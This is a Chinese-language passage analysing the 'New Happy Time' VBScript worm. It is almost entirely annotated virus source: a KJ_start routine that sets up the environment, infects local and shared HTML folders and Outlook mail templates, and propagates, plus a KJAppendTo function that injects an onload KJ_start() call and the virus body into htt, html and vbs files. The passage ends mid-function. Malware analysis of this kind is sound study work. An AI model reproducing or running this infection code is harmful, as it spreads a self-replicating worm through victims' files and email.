新欢乐时光代码分析

<%
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk

Sub KJ_start()
    ' 初始化变量
    KJSetDim()
    ' 初始化环境
    KJCreateMilieu()
    ' 感染本地或者共享上与html所在目录
    KJLikeIt()
    ' 通过vbs感染Outlook邮件模板
    KJCreateMail()
    ' 进行病毒传播
    KJPropagate()
End Sub

' 函数：KJAppendTo(FilePath,TypeStr)
' 功能：向指定类型的指定文件追加病毒
' 参数：
' FilePath 指定文件路径
' TypeStr 指定类型

Function KJAppendTo(FilePath, TypeStr)
    On Error Resume Next
    ' 以只读方式打开指定文件
    Set ReadTemp = FSO.OpenTextFile(FilePath, 1)
    ' 将文件内容读入到TmpStr变量中
    TmpStr = ReadTemp.ReadAll
    ' 判断文件中是否存在"KJ_start()"字符串，若存在说明已经感染，退出函数；
    ' 若文件长度小于1，也退出函数。
    If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
        ReadTemp.Close
        Exit Function
    End If
    ' 如果传过来的类型是"htt"
    ' 在文件头加上调用页面的时候加载KJ_start()函数;
    ' 在文件尾追加html版本的加密病毒体。
    ' 如果是"html"
    ' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
    ' 如果是"vbs"
    ' 在文件尾追加vbs版本的病毒体
    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath, 2)
        FileTemp.Write "<" & "BODY onload="""
        & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
        FileTemp.Close